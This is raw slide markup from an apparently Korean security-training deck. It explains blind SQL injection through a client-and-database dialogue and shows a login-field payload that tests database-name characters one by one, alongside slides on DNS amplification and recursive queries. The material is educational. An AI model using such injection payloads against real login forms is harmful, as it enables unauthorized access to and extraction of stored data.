              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>or</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>그런애</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="120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사용자</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(client)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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rgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DATABASE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>야</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>,,</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>데이터베이스 이름 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>번째 글자가 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘w’ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>이면</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>계정정보</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>에</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>,  ID </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>가</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>인 계정정보 줘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>로그인 성공</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>블라인드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(blind 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err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>WebRequest</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> @{ ID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin and if((select substring(database(),2,1)=‘w’) ‘#</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PASSWORD :</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 1234 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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1</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US"/>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어 있어 여기 계정정보</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="120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3</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US"/>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사용자</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(client)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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로그인 성공</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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SELECT </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                  <a:solidFill>
                    <a:srgbClr val="009400"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>user_name</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="009400"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>FROM </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>계정정보</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>WHERE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ID = ‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin and if((select substring(database(),2,1)=‘w’) ‘#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>and PWD = ‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1234</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>’</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24287812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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>블라인드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(blind injection)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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>? ? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ? ? ? ? ? ? ? ? ? ? ?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="360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 b c d e f g h I j k l m n o p q r s t u v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> x y z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A B C D E F G H I J K L M N O P Q R S T U V X Y Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~ ! @ # $ % ^ &amp; * ( ) _ + |</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t>IF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 로그인이 되지 않았음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>=&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>반복실행하면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>데이터베이스 이름 획득 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301065453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/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>증폭 공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(DNS Amplification)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/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>재귀 쿼리</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a:t>level 4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>level 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>=TLD</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>level 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>=SLD</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>level 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36735381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/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>재귀 쿼리</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/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>재귀 쿼리</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>재귀 쿼리</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>서버는 재귀적 질의와 반복적 질의 두가지의 시스템이 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>예시는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>재귀적 질의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>시스템 이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">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/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>쿼리의 타입</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/Environ</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>환경</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1040"/>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Python</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파이썬 설치</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윈도우 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>업데이트</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WSL2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WSL2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>설치</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WSL2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>도커</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>VMware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VMware </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>HackerSchool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해커스쿨 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>FTZ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>WSLOfflinePackageInstall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오프라인</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패키지 설치 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(bgpdump)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/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
